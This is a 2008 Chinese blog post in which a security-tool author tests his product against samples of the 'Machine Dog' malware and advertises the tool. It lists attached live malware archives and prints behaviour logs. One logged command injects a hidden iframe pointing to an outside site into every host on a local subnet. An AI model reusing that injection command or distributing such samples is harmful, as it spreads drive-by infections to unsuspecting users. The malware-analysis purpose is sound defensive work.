百度空间 | 百度首页 
 
查看文章
  
凝逸防御.机器1.3(测试2008.1.2最新机器狗样本)
2008-01-02 21:31

凝逸防御.机器1.3(测试2008.1.2最新机器狗样本)


==========样本==========
机器狗样本三只(不同版本)—警告:不得传播,为祸天下
机器狗样本,包含老旧三只。

这个蛮牛B的,我不敢做测试了,再测,我的这个冰点可就自身难保喽。。。。

[ 本帖最后由 5551551 于 2008-1-2 14:46 编辑 ]
附件
极毒机器狗病毒.rar (33.39 KB)
2008-1-2 01:43, 下载次数: 56

老一点的

最新机器狗病毒.rar (305.31 KB)
2008-1-2 01:43, 下载次数: 113

新版本的
--
下了新的一个...小红傘
[0] Archive type: RAR
--> conimem.exe
      [DETECTION] Contains detection pattern of the dropper

DR/Agent.318861
      [1] Archive type: RAR SFX (self extracting)
      --> Vml.exe
          [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
--> conime9.exe
      [DETECTION] Is the Trojan horse TR/PSW.QQpass.bbk
--> conimel.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.blm.3
      [INFO]      The file was deleted!
=====
木马名称:Trojan.BAT.Agent.o
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\最新机器狗病毒\CONIMEM.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-Downloader.Win32.EDog.d
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\最新机器狗病毒\CONIMEL.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\最新机器狗病毒\CONIME9.EXE
木马程序生成以下文件:
1) C:\PROGRAM FILES\INTERNET EXPLORER\PLUGINS\WN_SYS8X.SYS
是否删除木马程序及其衍生物?

Returnil 被穿透?
==============================


<=======================[测试]=======================>

1.用影子旧版,开全影子,
2.凝逸防御.机器狗1.3 ,打开"防御.机器狗"


=================

执行:[防御.U盘木马]
     C:\Autorun.inf|防御.
     D:\Autorun.inf|防御.
     E:\Autorun.inf|创建.防御.
     F:\Autorun.inf|创建.防御.
     防御完成!

执行:[删除木马]
     完成

执行:[防御.机器狗]
防御:1
防御:2
失败:3
防御:4
防御:5
防御:6
防御:7
防御:8
防御:9
防御:10
防御:11
防御:12
防御:13
防御:14
防御:15
完成
防疫
==============
执行:[扫描木马]
     完成
执行:[删除木马]
     C:\DOCUME~1\c1\LOCALS~1\Temp\LYLOADER.EXE 清空.禁止.
     完成
===============

运行 最新机器狗病毒.rar 极毒机器狗病毒.rar 中的机器狗病毒,结果参看图

[img]http://j.99081.com/www0009/nyfy.jqg.JPG[/img]

机器狗 有些能运,机器狗核实exe运行不了,重开机后,机器狗已没有了!

---------

2008-01-02 15:28:46 文件保护(修改文件)     操作:允许
进程路径:C:\最新机器狗病毒\conimel.exe
文件路径:C:\windows\system32\drivers\pcihdd.sys


2008-01-02 15:30:59 文件保护(创建文件)     操作:允许
进程路径:C:\极毒机器狗病毒\explorer.exe
文件路径:C:\windows\system32\drivers\pcihdd.sys


2008-01-02 15:33:22 修改文件     操作:允许
进程路径:C:\极毒机器狗病毒\E.tmp
文件路径:C:\windows\system32\DRIVERS\msconkt.sys

2008-01-02 15:33:16 创建文件     操作:允许
进程路径:C:\极毒机器狗病毒\Explorer.exe
文件路径:C:\windows\system32\drivers\pcihdd.sys


2008-01-02 15:33:23 修改文件     操作:允许
进程路径:C:\极毒机器狗病毒\11.tmp
文件路径:C:\windows\system32\DRIVERS\msconkt.sys


2008-01-02 15:32:21 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\windows\system32\cmd.exe
文件路径:C:\windows\system32\attrib.exe
命令行:"C:\windows\system32\verclsid.exe" -r -a -s -h
2008-01-02 15:32:21 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\windows\system32\cmd.exe
文件路径:C:\windows\system32\attrib.exe
命令行:"C:\windows\system32\verclsid.exe" -r -a -s -h
2008-01-02 15:32:21 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\windows\system32\cmd.exe
文件路径:C:\windows\system32\attrib.exe
命令行:"C:\windows\system32\verclsid.exe" -r -a -s -h
2008-01-02 15:29:46 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\Vml.exe
命令行:-idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert "<iframe src='http://xx.bao01.com/2.htm' width=20 height=1></iframe>"

2008-01-02 15:32:19 文件保护(创建文件)     操作:允许
进程路径:C:\Documents and Settings\Administrator\Local Settings\Temp\LYLOADER.EXE
文件路径:C:\windows\system32\LYMANGR.DLL
2008-01-02 15:29:44 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\windows\System32\WScript.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c run.bat


2008-01-02 15:29:38 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\最新机器狗病毒\conimem.exe
文件路径:C:\windows\System32\WScript.exe
命令行:"C:\WINDOWS\system32\3.vbs"

2008-01-02 16:15:17 文件保护(读取文件)     操作:允许
进程路径:C:\软件\1\1.EXE
文件路径:C:\windows\System32\WSockDrv32.dll
2008-01-02 16:15:03 文件保护(创建文件)     操作:允许
进程路径:C:\极毒机器狗病毒\userinit.exe
文件路径:C:\极毒机器狗病毒\6.tmp


2008-01-02 16:14:53 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\极毒机器狗病毒\userinit.exe
文件路径:C:\极毒机器狗病毒\Explorer.exe

2008-01-02 16:15:09 应用程序保护(运行应用程序)     操作:允许
进程路径:C:\极毒机器狗病毒\4.tmp
文件路径:C:\Documents and Settings\c1\Local Settings\Temp\LYLOADER.EXE
命令行:"C:\极毒机器狗病毒\4.tmp"

2008-01-02 16:15:12 文件保护(创建文件)     操作:允许
进程路径:C:\极毒机器狗病毒\7.tmp
文件路径:C:\windows\System32\IGB_TLBB_1001.exe


--------------


===========
        凝逸防御.机器狗

软件名称:凝逸防御.机器狗
软件版本:1.3
编程语言:易语言
软件作者:凝逸
软件官方:凝逸实验室
官方网站:http://hi.baidu.com/503165656
         http://ccc0.qyun.net/
软件说明:
---
防御级别:
     1.防御-机器狗
     2.禁止木马调用系统文件
     3.禁止所有系统文件
     4.自定清除木马文件(一行一个文件)
     5.自定禁止木马文件(一行一个文件)
防御时,不能关了本程!

置时间:
   限置时间,对抗改时间的木马!
---
注册费:5元/月/台,
未注册只是不能"自动运行"
---

        凝逸实验室
[凝逸反毒|凝逸QQ|凝逸防御.U盘木马|凝逸防御.机器狗]
http://hi.baidu.com/503165656
http://ccc0.qyun.net/
BBS:http://nyav.uu1001.com/
                        凝逸

客服QQ:503165656,771263817,q503165656@hotmail.com
病毒木马求助 QQ:503165656 QQ群:31168828(满)
(创建于:2007-01)

nyfy-jqg.exe

[img]http://j.99081.com/www0009/nyfy.jqg.JPG[/img]
升级贴:
http://hi.baidu.com/503165656/blog/item/80c7c3fe6b915d325c60088f.html


================
[凝逸防御.机器狗]升级说明:

1.3版 增加:
        1. 防御2008.1.1 最新机器狗
        2. 防御U盘木马
================


类别:病毒分析 | 添加到搜藏 | 浏览() | 评论 (2)
 
最近读者:
 
网友评论:
1
2008-02-01 13:18 | 回复
给个网址我要下啊
 
2
2008-02-01 13:40 | 回复
下 http://l.thec.cn/ccc0/n1.htm
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu